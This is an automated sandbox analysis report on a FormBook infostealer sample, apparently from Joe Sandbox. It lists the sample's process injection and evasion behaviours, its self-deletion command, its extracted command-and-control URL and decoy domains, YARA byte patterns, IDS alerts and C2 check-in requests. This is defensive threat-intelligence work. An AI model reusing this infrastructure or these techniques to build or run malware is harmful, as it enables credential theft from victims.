Windows Analysis Report
i5NDVAFg42.exe

Overview

General Information

Sample name: i5NDVAFg42.exe
renamed because original name is a hash value
Original sample name: d0b94b855d2f24add1edf6b3a6ecae24e4366f181a1ccd0bcd3b27e94de95bc0.exe
Analysis ID: 1410996
MD5: 728b83244a275ef0e29cb00aa0c6692c
SHA1: 8f744b5564e78ab054bc685bd12483c1ffd9de4d
SHA256: d0b94b855d2f24add1edf6b3a6ecae24e4366f181a1ccd0bcd3b27e94de95bc0
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • i5NDVAFg42.exe (PID: 3060 cmdline: C:\Users\user\Desktop\i5NDVAFg42.exe MD5: 728B83244A275EF0E29CB00AA0C6692C)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • autochk.exe (PID: 4280 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: FC398299F54290D5F35C69E865FD7CC2)
      • ipconfig.exe (PID: 1772 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
        • cmd.exe (PID: 2792 cmdline: /c del "C:\Users\user\Desktop\i5NDVAFg42.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}
Source | Rule | Description | Author | Strings
i5NDVAFg42.exe | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
i5NDVAFg42.exe | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
i5NDVAFg42.exe | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x5651:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1bfc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x9dcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x14cb7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
i5NDVAFg42.exe | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8d08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8f82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14ab5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x145a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14bb7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14d2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x999a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1381c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa693:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1ad27:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1bd2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
i5NDVAFg42.exe | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x17c49:$sqlite3step: 68 34 1C 7B E1
      • 0x17d5c:$sqlite3step: 68 34 1C 7B E1
      • 0x17c78:$sqlite3text: 68 38 2A 90 C5
      • 0x17d9d:$sqlite3text: 68 38 2A 90 C5
      • 0x17c8b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x17db3:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x6421:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xab9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x15a87:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x9ad8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x15aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa76a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x145ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1baf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1cafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x18a19:$sqlite3step: 68 34 1C 7B E1
          • 0x18b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x18a48:$sqlite3text: 68 38 2A 90 C5
          • 0x18b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x18a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18b83:$sqlite3blob: 68 53 D8 7F 8C
          Source | Rule | Description | Author | Strings
          0.2.i5NDVAFg42.exe.ce0000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          0.2.i5NDVAFg42.exe.ce0000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          0.2.i5NDVAFg42.exe.ce0000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
              • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
              • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
              • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
              • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          0.2.i5NDVAFg42.exe.ce0000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
              • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.i5NDVAFg42.exe.ce0000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
              • 0x17a49:$sqlite3step: 68 34 1C 7B E1
              • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
              • 0x17a78:$sqlite3text: 68 38 2A 90 C5
              • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
              • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
              • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
              No Sigma rule has matched
              Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
              03/18/24-14:45:01.182529 | 2031412 | 49716 | 80 | TCP | A Network Trojan was detected
              03/18/24-14:43:58.800885 | 2031412 | 49713 | 80 | TCP | A Network Trojan was detected
              03/18/24-14:45:21.823978 | 2031412 | 49717 | 80 | TCP | A Network Trojan was detected
              03/18/24-14:45:42.018352 | 2031412 | 49718 | 80 | TCP | A Network Trojan was detected
              03/18/24-14:43:40.128238 | 2031412 | 49712 | 80 | TCP | A Network Trojan was detected
              03/18/24-14:44:20.094348 | 2031412 | 49715 | 80 | TCP | A Network Trojan was detected
              03/18/24-14:46:45.274276 | 2031412 | 49720 | 80 | TCP | A Network Trojan was detected
              03/18/24-14:46:05.770153 | 2031412 | 49719 | 80 | TCP | A Network Trojan was detected

              AV Detection

              Source: i5NDVAFg42.exe | Avira: detected
              Source: http://www.yoursweets.online/vr01/www.nicholsonflooringservices.com | Avira URL Cloud: Label: malware
              Source: http://www.yoursweets.online | Avira URL Cloud: Label: malware
              Source: http://www.makeyousurprise.com/vr01/www.helyibudapest.com | Avira URL Cloud: Label: phishing
              Source: http://www.yoursweets.online/vr01/ | Avira URL Cloud: Label: malware
              Source: www.yoursweets.online/vr01/ | Avira URL Cloud: Label: malware
              Source: http://www.makeyousurprise.com | Avira URL Cloud: Label: phishing
              Source: http://www.makeyousurprise.com/vr01/ | Avira URL Cloud: Label: phishing
              Source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook
              Source: i5NDVAFg42.exe | ReversingLabs: Detection: 89%
              Source: Yara match | File source: i5NDVAFg42.exe, type: SAMPLE
              Source: Yara match | File source: 0.2.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0.0.i5NDVAFg42.exe.ce0000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000004.00000002.4447076688.0000000003152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4447693251.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000000.1986393514.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2046817591.0000000001AA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000002.00000002.4457850151.000000001098F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4447035918.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4448376202.0000000003E7F000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.4447615775.0000000003570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.2046471465.00000000016F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: i5NDVAFg42.exe | Joe Sandbox ML: detected
              Source: i5NDVAFg42.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: i5NDVAFg42.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: ipconfig.pdb source: i5NDVAFg42.exe, 00000000.00000003.2044767474.0000000001245000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046841117.0000000001AD0000.00000040.10000000.00040000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.2044525388.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4446909589.0000000000A90000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: ipconfig.pdbGCTL source: i5NDVAFg42.exe, 00000000.00000003.2044767474.0000000001245000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046841117.0000000001AD0000.00000040.10000000.00040000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.2044525388.000000000123F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4446909589.0000000000A90000.00000040.80000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: i5NDVAFg42.exe, 00000000.00000003.1987282372.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.1989066813.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.00000000018EE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003930000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2045464190.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2047562962.0000000003780000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: i5NDVAFg42.exe, i5NDVAFg42.exe, 00000000.00000003.1987282372.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000003.1989066813.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, i5NDVAFg42.exe, 00000000.00000002.2046523999.00000000018EE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000004.00000002.4447883047.0000000003ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.4447883047.0000000003930000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2045464190.00000000035D9000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.2047562962.0000000003780000.00000004.00000020.00020000.00000000.sdmp

              Networking

              Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 45.88.201.15:80
              Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 76.223.105.230:80
              Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 104.16.36.105:80
              Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49716 -> 35.214.118.179:80
              Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 69.57.172.11:80
              Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 34.149.87.45:80
              Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 72.14.185.43:80
              Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 3.33.130.190:80
              Source: C:\Windows\explorer.exe | Network Connect: 76.223.105.230 80
              Source: C:\Windows\explorer.exe | Network Connect: 45.88.201.15 80
              Source: C:\Windows\explorer.exe | Network Connect: 104.16.36.105 80
              Source: C:\Windows\explorer.exe | Network Connect: 35.214.118.179 80
              Source: C:\Windows\explorer.exe | Network Connect: 34.149.87.45 80
              Source: C:\Windows\explorer.exe | Network Connect: 3.33.130.190 80
              Source: C:\Windows\explorer.exe | Network Connect: 69.57.172.11 80
              Source: C:\Windows\explorer.exe | Network Connect: 72.14.185.43 80
              Source: Malware configuration extractor | URLs: www.yoursweets.online/vr01/
              Source: global traffic | HTTP traffic detected: GET /vr01/?F8=w7umpJ+rfj3CGTpHxtSOPW9QQGzAdMNJjdAKE5hb1nYkCdk9PPEgcDhma/h12TSv3owP&K0Dl=8pkho2W8C2 HTTP/1.1 | Host: www.gratiasempirellc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
              Source: global traffic | HTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=afsJSrVtQy935SgvDMKIlJRgvlqACV7EhITZbFrNAvlElQGaJzKQmMA6gaTM16h48AiD HTTP/1.1 | Host: www.laneflowlogistics.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
              Source: global traffic | HTTP traffic detected: GET /vr01/?F8=kCWTp1EUleadtFJdIzCu6Df5MNzEbmwToUUw4IkBm959jVVvzkoQYbPRGEEyl/3/RaO8&K0Dl=8pkho2W8C2 HTTP/1.1 | Host: www.familyofficesheet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
              Source: global traffic | HTTP traffic detected: GET /vr01/?F8=Qr63XqLLwL8kZKZ1R+KG3ClgUrm6jRe21pOgDYnjKSMcuwj3QpCJccHr2dssKI7zl3t9&K0Dl=8pkho2W8C2 HTTP/1.1 | Host: www.flavorfog.online | Connection: close | Data Raw: 00 00 00 00 00 00 00
              Source: global traffic | HTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=3hn83+NBBYNXWUD9Y/r7Xs4IAViW+ZrQ9Q/N09yYT452ZMDcSpE7Ef8yOdRKd9g47dJA HTTP/1.1 | Host: www.bharatcrimecontrol24news.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
              Source: global traffic | HTTP traffic detected: GET /vr01/?F8=0FWlSxHnm0VS79clrGeEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZVSnHMmj/6/I&K0Dl=8pkho2W8C2 HTTP/1.1 | Host: www.kirtirefrigeration.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
              Source: global traffic | HTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=nF7lN0R+GAMQz/Akw9zAFS8sK1vaMqXOBBmwCvkEKDYNrGKPEkcEeMds11lXmHU70D3D HTTP/1.1 | Host: www.topdeals.biz | Connection: close | Data Raw: 00 00 00 00 00 00 00
              Source: global traffic | HTTP traffic detected: GET /vr01/?K0Dl=8pkho2W8C2&F8=XJpxajiERfwYWZCBMKFPnJULtBnU/CqQJGR7CZrrgovMO9KS90T7etXRllYWrqB0ffTS HTTP/1.1 | Host: www.accidentapp.online | Connection: close | Data Raw: 00 00 00 00 00 00 00
              Source: Joe Sandbox View | IP Address: 76.223.105.230 76.223.105.230
              Source: Joe Sandbox View | IP Address: 34.149.87.45 34.149.87.45
              Source: Joe Sandbox View | ASN Name: GOOGLE-2US GOOGLE-2US
              Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox View | ASN Name: DMITUS DMITUS
              Source: Joe Sandbox View | ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\explorer.exe | Code function: 2_2_0E4D3F82 getaddrinfo,setsockopt,recv,2_2_0E4D3F82
              Source: unknown | DNS traffic detected: queries for: www.gratiasempirellc.com
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | x-powered-by: PHP/8.0.30 | expires: Wed, 11 Jan 1984 05:00:00 GMT | cache-control: no-cache, must-revalidate, max-age=0 | content-type: text/html; charset=UTF-8 | link: <https://www.gratiasempirellc.com/wp-json/>; rel="https://api.w.org/" | transfer-encoding: chunked | date: Mon, 18 Mar 2024 13:43:39 GMT | server: LiteSpeed
              Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | server: openresty/1.13.6.1 | date: Mon, 18 Mar 2024 13:46:05 GMT | content-type: text/html | content-length: 175 | connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4451988670.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: explorer.exe, 00000002.00000002.4446973075.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1992382164.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4451988670.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4451988670.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: explorer.exe, 00000002.00000002.4451988670.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4451988670.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1998453035.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
              Source: explorer.exe, 00000002.00000000.1998453035.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4451988670.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
              Source: explorer.exe, 00000002.00000002.4451565854.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1996456551.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1997368298.0000000008890000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.accidentapp.online
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.accidentapp.online/vr01/
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.accidentapp.online/vr01/www.yoursweets.online
              Source: explorer.exe, 00000002.00000003.3096549318.000000000C8C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095821378.000000000C8AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4455815731.000000000C89C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780333712.000000000C8B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095666547.000000000C899000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3780760636.000000000C8C7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.accidentapp.onlineReferer:
              Source: explorer.exe, 00000002.00000002.4455332318.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096004906.000000000C85F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2005546585.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
